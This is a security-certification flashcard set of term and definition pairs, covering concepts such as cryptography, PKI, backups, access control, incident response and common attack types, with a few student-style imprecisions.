restore from good backups. or rebuild from scratch. large-scale rebuilding may take months and have phases.

Host-based firewall (2)

restricts access to device. prevents programs on device from accessing network

Impact: Property

risk to buildings and assets

what are Network scanners good at finding?

rogue systems

Job rotation

rotating employees to different jobs and responsibilities in an organization.

examples of systems RADIUS can authenticate to (6)

routers, switches, firewalls. server authentication. remote VPN access. 802.1X network access

Backup utilities (3)

rsync: real-time file sync. regular partial backups: hourly incremental backups. Full backups: file, system images.

Script kiddies (Internal/external, Level of sophistication, Resources/funding, Intent/motivation)

runs pre-made scripts to find vulnerabilities without much knowledge of what's happening usually external not very sophisticated no formal funding motivated by ego, the hunt

php is what kind of code?

runtime code (example)

SATCOM

satellite communication from remote locations and natural disaster sites

WinDump file format

saved in pcap format can be loaded in a protocol analyzer later

tcpdump file format

saved in pcap format so it can be loaded in a protocol analyzer later

credentialed scan

scan that uses a legitimate user name and password access to try to get around the existing security

Identify vulnerability

scanners looks through a well defined list of known vulnerabilities based on what it sees in that system.

Iris scanner

scans texture or color of the eye

Retinal scanner

scans the unique capillary structure in the back of the eye

Fighting Rogue access point (2)

schedule a periodic survey. Use some 3rd party tool like WiFi Pineapple. Configure 802.1X (NAC)

full device encryption

scrambles all data to protect content even if the device is lost or stolen

Security through obscurity examples (5)

secrecy of design. substitution cipher, e.g. ROT13 SSID broadcast suppression, MAC filtering

Development environment

secure environment where code can be written and moved to a sandbox for additional testing.

Extranet

secure private network where trusted 3rd parties authenticate to have access to certain resources but not the internal network

Key management life cycle: storage

securely store and protect against unauthorized use

Administrative controls examples (2)

security policies. Standard operating procedures (control example)

Steganography

security through obscurity that hides a message in an image.

Digital camera security concerns (2)

seen as removable storage device when plugged into comp over USB so same removable media concerns. firmware can be compromised and viewed.

Physical Segmentation (2)

segmentation of networks using separate physical devices. Need a switch or router to connect them

Segmentation aka (2)

segregation, isolation

Cross-site request forgery example

send transfer request to a bank when clicking a link to send money to the bad guy.

PAP authentication process

send username and password to PAP server. If it matches you gain access

Vaulting

send your backup media to an outside storage facility

dynamic analysis

sending random input into an application to see what it will do.

SYN Flood (4)

sends a large number of SYN requests (the first step in creating a new TCP connection). After this the attacker ignores the ACK which is sent back from the server and simply sends another SYN. The goal is to overload the server with huge number of open TCP connections so the server will not be able to respond to valid traffic from normal users. results in a DoS.

Wireless keyboard and mice security concerns (3)

sends data using proprietary protocol to computer unencrypted. data can be captured similarly to keyloggers. Inject keystrokes and mouses movements to control computer remotely.

Bluejacking (4)

sends unsolicited messages to mobile devices. can be associated to address book "Hi, world! Add to contacts?" 10 meter range. Updated and doesn't occur

How effective is an Out-of-band response? (2)

sent after-the-fact and may not be fully stopped UDP doesn't allow a reset for this mode

Mutual authentication trust model

server and client both trust each other's certificates.

good place to implement Lockout and why?

service accounts to prevent Brute force attacks.

Ephemeral key example

session key (example of)

Automated Courses of Action (2)

set of automated responses to problems that were predicted. common in cloud-based infrastructure maintenance.

Secure baseline of a deploying application (5)

set of baselines defining exactly how the application should perform: Firewall settings, patch levels, OS file versions. may require constant updates

Things MDM can set policies for? (3)

set policies on applications, data, camera, etc

carrier unlocking security

set policies on what people are able to do with mobile devices and carriers

Least Privilege on Accounts

set rights and permissions on user accounts to the bare minimum of what they need.

Group policy Security control (4 eg)

set rules in the OS: can limit minimum or maximum password lengths. require smart card to authenticate. maximum security log size. Enforce user login restrictions

Community cloud deployment model

several organization share the same resources over a cloud

File integrity check for windows

sfc

Password recovery

should not be a trivial process since this is a good opportunity for social engineering

Hash concerns

should not have collisions.

Large-scale recovery (1, 2 eg,1, 2 eg)

should start with quick, high-value security changes. e.g. patches, firewall changes. Later phases involve "heavy lifting" and take more time e.g. Infrastructure changes and large-scale security roll-outs.

ifconfig (2)

shows IP, MAC, network adapter info, etc. Linux interface configuration.

ipconfig (2)

shows IP, MAC, network adapter info, etc. Windows TCP configuration

Screen filters

shows whats on the screen to only the person right in front of the monitor.

Pentest (vs vulnerability reason to?)

simulate an attack against a device. different from vulnerability scanning in that it tries to exploit the vulnerabilities. could be compliance mandate done regularly by 3rd party

VDI updates

since application are managed centrally no need to update all mobile devices.

NTP vulnerabilities

since no security features, its exploited as amplifiers in DDoS

Application servers

sits in the middle of web servers and databases that provides programming languages, runtime libraries, etc.

Brute force attack Online (2)

slow process. after multiple login attempts process may slow down or lockout

RFID (3)

small chips for tracking. RF powers tag and ID is transmitted back. Some tags are always on

DES concerns

small key makes it easy to brute force today

CAC card

smart card used US Department of Defense. has a picture, identification information and certificate.

PIV card

smart card used by the US Federal Government. has a picture, identification information and certificate.

User certificates examples (2)

smart cards, digital access cards on a device or computer.

where is Infrared used? (3)

smartphones, tablets, smartwatches to control entertainment center.

examples of where Version Control is found. (4)

software development. OS. wiki software. cloud-based file storage

GPG (2)

software implemented by OpenPGP as an open standard. compatible with commercial PGP.

Antivirus

software that runs in OS that looks for viruses trying to download and execute.

Stress testing

software that simulates one to thousands of users to see what results of the application reaching its limit.

port mirrors (2)

software-based tap that is built-in to network switches that can send copies of traffic to an analysis tool. limited functionality.

Replay attack vs cryptography (2)

some algorithms more susceptible if no salt, no session ID tracking, no encryption. some have countermeasures: Kerberos has time stamps that discards anything past it TTL.

Legal issue with data destruction

some data cannot be destroyed and may have to be stored offsite instead.

Impact: Safety

some environments are too dangerous to work

Track man-hours (and expenses) (3)

some incidents can use massive resources all at once or over long period. be as accurate as possible. may be required for restitution in a legal environment.

Wireless keyboard and mice security

some manufacturers implement AES encryption to protect from wireless capture and injection.

Role-based awareness training: Systems administrator

some one who enables the use of the applications and data.

How to fight ransomware and Crypto-malware (4)

some ransomware can be fake and removed without harming data. Crypto-malware needs a key that only the bad guy has and payment methods are untraceable. This can be recovered from using offline backups. Also update antivirus/malware, OS and applications.

Key escrow

someone else holds your decryption keys i.e. private keys are in the hands of a 3rd-party.

executive user (2)

someone responsible for the overall use of the application. Evaluates goals and makes decisions for future use of data.

System owner (3)

someone who makes decisions about the overall operation of the application and data. defines security policies and backup policies. manages changes and updates

Role-based awareness training: User (2)

someone who uses applications day to day. has the least privileged access to the application

Privileged user

someone with additional application and data permissions.

Insiders (Internal/external, Level of sophistication, Resources/funding, Intent/motivation)

sophistication may not be advanced but has institutional knowledge: understand the network and hardware locations and may have access to many of those systems extensive resources since they work there.

Runtime code (3)

source code is viewable. code instructions execute when app is run. no way to check for errors before app is run.

Advanced Malware Tools

specialized removal and recovery tools for systems already infected.

How to embed and read text from an image

specialized stenography software

Active Reconnaissance (5)

stage of pentest where locating open doors to your target without trying to exploit them. Usually done with vulnerability scan. ping scans, port scans. DNS queries. OS scans, use OS fingerprinting. service scans, version scans

Syslog

standard method for message logging across diverse systems to send to a central logging receiver usually on a SIEM

X.500

standard that allows LDAP to communicate with different OS and technologies

HIPS/HIDS implementation old and new

started as a separate application. Now integrated into anti-virus or anti-malware suites ("endpoint" products)

Most firewalls these days are this type.

stateful firewall

Type of authentication, Token based authentication uses.

stateless authentication

where is the OSCP status stored and stapled? (2)

status info is stored on the certs holder's server. it is "stapled" into the SSL/TLS handshake.

Where TACACS+ is used

still exclusively used with Cisco systems but can use open standard to connect into Cisco Infrastructure.

places air gaps are used (4)

stock market networks. Power systems/SCADA. On airplanes. Nuclear power plant operations

Ways antivirus software stops viruses (3)

stop downloads. prevent execution. prevent visit of a known bad URL

Risk avoidance

stop participating in high-risk activity

External storage devices

storage outside the computer that's very portable and convenient for moving large files.

WORM (2)

storage that can't be changed, good for storing long term data like SIEM logs (e.g. DVD-R)

Third-party app stores (2)

stores to allow installation of 3rd party apps. may not include central app clearinghouses.

RC4 (3)

stream cipher. part of WEP standard, Part of SSL but removed from TLS.

(Backup) Location Selection (2)

subject to different legal implications and data sovereignty

Caesar cipher

substitution cipher where every letter is substituted with another at a fixed position.

Time synchronization for SIEM (2)

synchronizing all clocks on all network devices to compare time stamps of events. can use NTP.

high availability

systems are always available and always on at any time.

Malicious Ways to DoS (3 eg)

take advantage of a design failure or vulnerability. Being hit by too much traffic. turning off the power to a building

Stored procedures

take long SQL requests and stores them on the database. Use call command with name

SASL (2 eg)

takes existing protocols like LDAP and provides authentication using many different methods e.g. Kerberos or client certificate, etc.

what port does LDAP run on?

tcp/udp 389

Cable locks

temporary security for laptops that connects a cable to a standard reinforced notch connector found on most laptops. the cable can be tied down e.g. to the leg of a table.

Ping (3)

test availability, round-trip time. uses ICMP. one of your primary troubleshooting tools

Workstation OS

the OS type used by users at their desks.

Failover

the act of moving business process to a recovery site.

dissemination

the action or fact of spreading something, especially information, widely.

non-repudiation

the assurance that someone cannot deny the validity of something.

platform

the basic hardware (computer) and software (operating system) on which software applications can be run.

Templates (2)

the basic structure of an application instance configured with a web server and database server, certificates, etc. requires more configuration specific to the application instance which can be automated as well.

Data-in-use

the data in the memory.

fighting cross-site request forgeries (2)

the developer should make sure the application validates the users properly. Application should have anti-forgery techniques added like a cryptographic token and encryption.

Differential Backup Recovery process

the differential backup and the full backup.

Alternate processing sites

the disaster recovery sites that business processes failover to until the primary location recovers.

confusion (2)

the encrypted data is drastically different than the plaintext. no discernible patterns to recognize the plaintext.

Improper error handling (5 eg)

the error messages that are not properly modified by the developer and tend to display: too much detail. network information. memory dump. stack traces. database dumps

MTTF

the expected lifetime of a non-repairable product or system

the pivot

the foothold point to a network that once set up, its easy to move through the network since security inside is limited

Mission-essential functions

the functions of the organization that should take priority in restoring during recover e.g. after a hurricane.

Key strength

the larger these are, the harder to brute force them

False acceptance rate (FAR)

the likelihood that an unauthorized user will gain access with biometrics that don't belong to them.

CRL (2)

the list of revoked certificates. maintain by the CA.

RTO (2)

the maximum amount of time it can take to restore a system after an outage. must be back to a particular service level

Password cracker (4)

the means to try to crack a hash of a password. It involves first somehow obtaining the password hashes files. No salt or weak hash is easy to brute-force. Rainbow tables if these hashes previously brute forced (cloud, John the ripper, Ophcrack)

asset value

the monetary cost of an asset.

Application Whitelisting (2)

the practice allowing specifically named application on an OS. Often built-in to the OS management

Steganography (2)

the practice of concealing a file, message, image, or video within another file, message, image, or video. Also data in other data e.g. data in TCP packets.

Tarpitting

the practice of slowing the transmission of e-mail messages sent in bulk as a means of thwarting spammers

SLL offload

the process a SSL accelerator uses to offload the asymmetric SSL handshake from the web server.

OS fingerprinting

the process of determining the operating system used by a host on a network without having to authenticate to the system

Supply chain

the process of getting a product or service from the supplier to the customer.

Patch management

the process of regularly applying patches to software for system stability and security fixes.

Root certificate (3)

the public key certificate that identifies the root CA. It issues other certificates. should be highly secure

Impact: Finance

the resulting financial cost during an incident

Principles of social engineering: Scarcity (2)

the situation will not be this way for long. adds a timer to resolve fake problem.

Exploiting Vulnerabilities (2) (and reasons to be careful: 3)

the stage after recon where you try to take advantage of exploits. ultimate test of security. can cause DoS and data loss during production hours. Buffer overflows can cause instability. Gain privilege escalation

Version Control

the tracking of changes that lets you revert to a previous version

RTOS security concerns

there shouldn't be anything that embeds into these to prevent them from being always available.

Printers/MFD

these days printers can have scanners, fax, network connection, local storage, etc

On-boarding IT agreements

things to be signed when bringing in a new person like employee handbook or separate AUP.

Hoaxes

threats that don't actually exist and tend to waste time or deceive to take money.

CHAP authentication process

three-way handshake: client sends username to server. server sends a challenge message. Client responds with a password hash calculated from the challenge and the password. Server compares received hash with stored hash.

USB OTG security and concern

too convenient. can disable with MDM

ECB use

too simple for most use cases

static code analyzer (2)

tool to find security vulnerabilities in source code. gives options for alternative code.

Split tunnel

traffic going to the corporate network runs through a tunnel while all other traffic runs its normal routes.

cellular security concerns (3)

traffic monitoring. location tracking. worldwide access to a mobile device

loop (2)

traffic sent between 2 switches connected together will go back and forth forever since no counting mechanism on MAC layer. Brings down network fast

Incident response team

trained response team that deals with security incidents

Platform as a service security

trained security professionals manage the security and controls of the data in the cloud

Elasticity

trait of cloud that lets you add new resources and scale down as needed.

Man-in-the-browser (3)

trojans or malware acts as a proxy in the computer to send traffic to the bad guy from between the browser and the computer. Traffic is unencrypted on the computer. They can replay traffic of bank logins later.

How is communication trusted between sites (3)

trusted CA sign web server's encryption certificate that the web site payed for. CA validated identify before signing: DNS record, phone call etc. User browser checks signature and compares it to its list of trusted CA

TPM

trusted hardware on a motherboard in charge of supporting cryptographic functions.

Dual control examples (2)

two keys open a safe and each located on a different person. Or two keys to launch a missile.

Collision

two messages having the exact same hash.

Asymmetric algorithm (4)

two or more mathematically related keys. private key. public key which is seen by every one. Only private key can decrypt public key.

Kiosk OS

type of OS found in Public devices and tightly locked down.

Appliance OS (2)

type of OS that is purpose built, and minimal. often unseen by user.

brandjacking

type of URL hijacking where a brand name associated with a URL is claim by malicious users.

deterrent

type of control that discourages an intrusion attempt.

public data

unclassified data with no restrictions on view

some results of stress testing (3)

unintended error messages. application details and versions displayed to the user. kernel and memory dumps (crashes)

Wiping (2)

unrecoverable removal of data on a storage device. Usually overwrites the data storage locations multiple time with 1s and 0s.

Provisioning when deploying Network security (3)

update secure VLAN config, add firewall rules, update VPN access

Site-to-Site VPNs

use VPN Concentrators or firewalls to encrypt communicate across the internet.

symmetric algorithm

use a single shared key for both encryption and decryption.

Best Validation Point to use

use both server-side and client-side.

Biometrics (2)

use face or fingerprint as authentication. some apps require this authentication

ECC advantages

use less CPU cycles on mobile devices and less battery.

Secure Wireless Topology Authentication (3)

use normal login credentials with 802.1X standard. integrated with existing name services. No shared passwords

Group policy Administrative control (4 eg)

use of group policy to limit what people can do in an OS: remove Add or Remove Programs. prohibit changing sounds. Allow font downloads. Only allow approved domains to use ActiveX without prompt

Take hashes (for forensics) (3)

use on digital info and again later to confirm values match. MD5 128 bit hash, chance of duplication is 1 in 2^128. CRC 32 bit hash

Shredding/pulverizing (2)

use physical machinery to destroy media. can be done with a drill or hammer.

DER uses (2)

used across many platforms. Often used with Java certificates.

AUP security (2)

used by an organization to limit legal liability. should be well documented to give good reason as to why some one is dismissed.

Mail gateways (4)

used by organisations to filter unsolicited mail inbound and outbound, on-site or cloud-based. blocks phishing attempts. anti-virus. DLP

OCSP (2)

used by the browser to check the certificate revocation. sent via HTTP.

Diffie-Hellman uses (3)

used for Perfect Forward Secrecy. Ephemeral Diffie-Hellman (EDH or DHE). Combine with ECC for ECDHE.

data retention security

used for version controls. recover from virus infections that are not identified immediately.

Hot and cold aisles (2)

used in most data centers to cool systems. Hard or soft walls separate them.

HMAC uses (2)

used in network encryption protocols: IPsec. TLS

HSM Environments (3)

used in very large environments with lots of web servers to secure and keys to store and backup. often found clustered together and with redundant power supplies. also used to offload CPU overhead from other devices

Non-persistence: Snapshots

used to capture a point in time of particular configuration, application instance, or data.

Non-persistence

used to describe application instances on how they can be built up and torn down in a matter of moments.

Use of third-party libraries and SDKs

used to extend the functionality of a programming language

Crypto modules (2 def)

used with API when developing applications to generate cipher text. a set of hardware, software, and/or firmware that implements cryptographic functions

Version control security

useful for seeing how and when files were modified.

advantage of wiping

useful when you need to reuse or continuing using the media.

(Account management) location-based policies (2 eg)

user access can be based on location, e.g. restrict application use to only when near the office. or block IP addresses from other countries.

Corporate-owned deployment model

user device that company owns and controls and is not for personal use

Infrastructure as a Service Security

user is responsible for the installation, management and security of the data

IEEE 802.1x: supplicant

user workstation

(Account management) Standard naming convention (6)

usernames shouldn't conflict. same username should be used across multiple systems. should be consistent naming across all users. names should not describe role or status as these change. Persistent for duration of employment. memorable but not recognizable.

Secure POP/IMAP

uses STARTTLS extension to encrypt with SSL

resources to allow full device encryption

uses a lot of CPU cycles

Software as a service

"on-demand software" where application and data is in the cloud and no development or maintenance is necessary from user ends.

netcat (5)

"read" and "write" to the network without using their normal clients. Listen on a port number. transfer data. scan ports and send data to a port. can run as a shell (backdoor) to a remote device by making it listen to a port. (alternatives: Ncat.)

SYNful Knock

(Discovered in sept 2015) a malicious firmware that infected hundreds of Cisco routers allowing backdoor access.

What access do user accounts not have?

(account that have) no privileged access to OS

Agreement types

- BPA - SLA - ISA - MOU/MOA

Threat assessment (4)

- Environmental - Manmade - Internal vs. external

SHA256 hash bits and characters

256 bits. 64 hexadecimal characters

Risk Acceptance

A business decision to take a risk

Corrective (control)

A control that mitigates damage of an attack.

Microsoft CryptoAPI

Application developers write to this to bridge the application and the Crypto service provider (CSP).

Ways to Application Whitelist (4)

Application hash. Certificate. Path. Network zone

application-based firewall (aka 4)

Application layer gateway stateful multilayer inspection deep packet inspection Next generation firewall

MS-CHAP

Authentication protocol used on Microsoft's PPTP

Reasons to DoS (2)

Competitive advantage. Smokescreen for some other exploit e.g. DNS spoofing attack

Documented incident types/category definitions (2)

Computer Incident Handling Guide available from NIST. can make your own that makes sense for organization.

WORM example

DVD-R

Problem with SHA-1

Hash collisions - many collision attacks identified

HTTPS

Implements SSL/TLS

ITIL formerly called

Information Technology Infrastructure Library

LDAPS stands for?

LDAP Secure.

netcat alternative

Ncat

ways to research which services can be disabled (2)

Online, manufacturer's website. Trial and error.

X.500 Attribute O

Organization. The name of the organization

Discretionary Access Control (DAC)

Owner of files decides who gains access to files.

FTPS

Provides file transfers over SSL

OAuth was created by

Twitter, Google and others

Brute force attack

Use every combination of letters, characters and number to determine a password

Improper input handling (2, 3 eg)

When a programmer doesn't validate that all of the data passed into an application, a hacker can inject malicious data and cause SQL injections, buffer overflows, DoS, etc. Takes work to find input that's malicious

DHCP Starvation Attack (2)

When a spoofed MAC address is constantly requesting DHCP addresses from a DHCP servers. This will quickly cause the server to run out of IP addresses.

System sprawl/undocumented assets (2)

When an organization adds more servers or systems to the network without properly documenting their maintenance requirements. These systems can be forgotten and result in becoming a vulnerability or pivot points.

Memory Leak

When memory is allocated and never released after it's finished being used. It grows and eventually uses all available memory causing an application or system crash

URL hijacking

When traffic going to a site is hijacked for malicious use.

PKCS #7 uses (3)

Wide platform support: Windows Java Tomcat

Software packages to build Private CA (#?)

Windows Certificate Services, OpenCA

removable media control

Windows Event Log can log files copied/removed to portable media.

preventive (controls)

a control that keeps people away from your systems.

Federation

allows authentication using a third-party account.

COBIT created by

created by ISACA

Something you are advantages

difficult to change

E-vaulting

electronically backup data to an outside storage facility

Tabletop exercise

gather the key players and talk through a simulated disaster.

not-intrusive scan (eg)

gathering info without trying to exploit vulnerabilities. e.g. packet capture

Type II hypervisor

hypervisor that runs on top of existing host OS i.e. Windows, Linux, Mac OS X, etc.

Salt advantages (2)

identical passwords have different hashes. if password database is breached can't correlate any passwords

Risk register (2)

identify, document and find solutions to risks associated with each step of a project. Monitor the results. record of information about identified risks (ISO definition)

Capturing IV example

ie Airodump can be used to capture packets.

VM escape protection concerns (i.e)

if allowed to break out of VM, the user can have control of host and other guest VMs. i.e. Full control of that virtual world.

password expiration benefit to security

if credentials are made available to some one else, constant change would limit the scope of their access.

code reuse security issues

if the original code has vulnerabilities copied code spreads them.

ECB concerns (2)

if the plaintext is the same, the ciphertext will be the same. i.e. No randomization

(Account management) Group-based access control security and concerns

implicit permission from multiple groups can conflict with one another. Make sure users have correct access for their job role.

Mandatory vacations security

important in high-security environments to rotate others through the job and potentially locate fraud.

Insider threats security

important to assign just the right amount of rights and permission for their job

Difference between hash and encrypted data

impossible to recover the original message from a hash.

Permission issues (2)

improper protection that leaves a door wide open. a simple oversight but huge vulnerability

Alternate business practices (2)

in case normal practices are disrupted during disasters have backup practices. These must be documented and tested before a problem occurs.

Where is Wifi Direct commonly found?

in home devices

How would some one try to tap copper?

inductive tap

Fighting Rainbow tables

salt hashes

fighting replay attacks/pass the hash

salt or encryption

(OCSP) stapling advantage

scales well.

degaussing

sends a magnetic field through a device to destroy data and electronics.

Active (security) tools (3 eg)

sends traffic to a device and watches the results: Query a login page. try a known vulnerability. check account access

cookies (3)

small information stored on comp by browser used for tracking, personalization, session management. These are non executable. Not generally a security risk.

windows traceroute

tracert

Mobile OS

type of OS designed for touch screen phones and tablets.

SHA-2

up to 512 -bit digest.

3DES

uses 3 different keys to encrypt, then decrypt, then encrypt again.

DES

uses 64-bit block cipher. Used a 56 bit key.

Quantitative risk assessment

usually calculated with ALE

Automated Courses of Action example

when a storage drive begins to get full can automate storage drive to clear out some space.

PPP authentications

• CHAP • PAP • MSCHAP

fuzzing aka

(aka) dynamic analysis

deterrent examples (2)

(control example) warnings signs login banner

Rule Based Access Control (RBAC) examples (3)

(examples of) often used in firewalls. Lab network access only available between 9 AM and 5 PM. Only Chrome browsers can fill out a web form.

Crypto service provider

(mostly windows) software library that provides cryptography for applications (mostly development).

Access violations (2)

(segmentation fault) an error that occurs when a program tries to access restricted areas of memory. OS prevents this and usually crashes the program

Wildcard domain example

*.example.com * can be www. , www1, ftp, web server, etc.

Symmetric algorithms examples (6)

- AES - DES - 3DES - RC4 - Blowfish/Twofish

Risk response techniques (4)

- Accept - Transfer - Avoid - Mitigate

Key stretching algorithms (2)

- BCRYPT - PBKDF2

Data destruction and media sanitization (7)

- Burning - Shredding - Pulping - Pulverizing - Degaussing - Purging - Wiping

PKI Components (9)

- CA - Intermediate CA - CRL - OCSP - CSR - Certificate - Public key - Private key - Object identifiers (OID)

Cipher modes (5)

- CBC - GCM - ECB - CTR - Stream vs. block

Data acquisition (for forensics) (7)

- Capture system image - Network traffic and logs - Capture video - Record time offset - Take hashes - Screenshots - Witness interviews

Data sensitivity labeling and handling (6)

- Confidential - Private - Public - Proprietary - PII - PHI

Certificate formats (6)

- DER - PEM - PFX - CER - P12 - P7B

Roles that need Role-based awareness training (6)

- Data owner - Systems administrator - System owner - User - Privileged user - Executive user

Backup concepts

- Differential - Incremental - Snapshots - Full

Incident response plan (5)

- Documented incident types/category definitions - Roles and responsibilities - Reporting requirements/escalation - Cyber-incident response teams - Exercise

Wireless Authentication protocols (7)

- EAP - PEAP - EAP-FAST - EAP-TLS - EAP-TTLS - IEEE 802.1x - RADIUS Federation

Continuity of operations planning

- Exercises/tabletop - After-action reports - Failover - Alternate processing sites - Alternate business practices

Biometric factors (8 including "rates")

- Fingerprint scanner - Retinal scanner - Iris scanner - Voice recognition - Facial recognition - False acceptance rate - False rejection rate - Crossover error rate

Recovery sites

- Hot site - Warm site - Cold site

Impact examples (5)

- Life - Property - Safety - Finance - Reputation


Ensembles d'études connexes

A5_M4: Agreed-upon procedures and prospective financial statements.

View Set

Hematology embriology & Anatomy Amboss Q&A

View Set

Phys6C Ch41 Nuclear Physics and Radioactivity

View Set

General Psychology Final Exam Review (Columbia College: McMahon)

View Set

Chapter 6 anatomy and physiology for massage therapy

View Set

Career Planning personal finance

View Set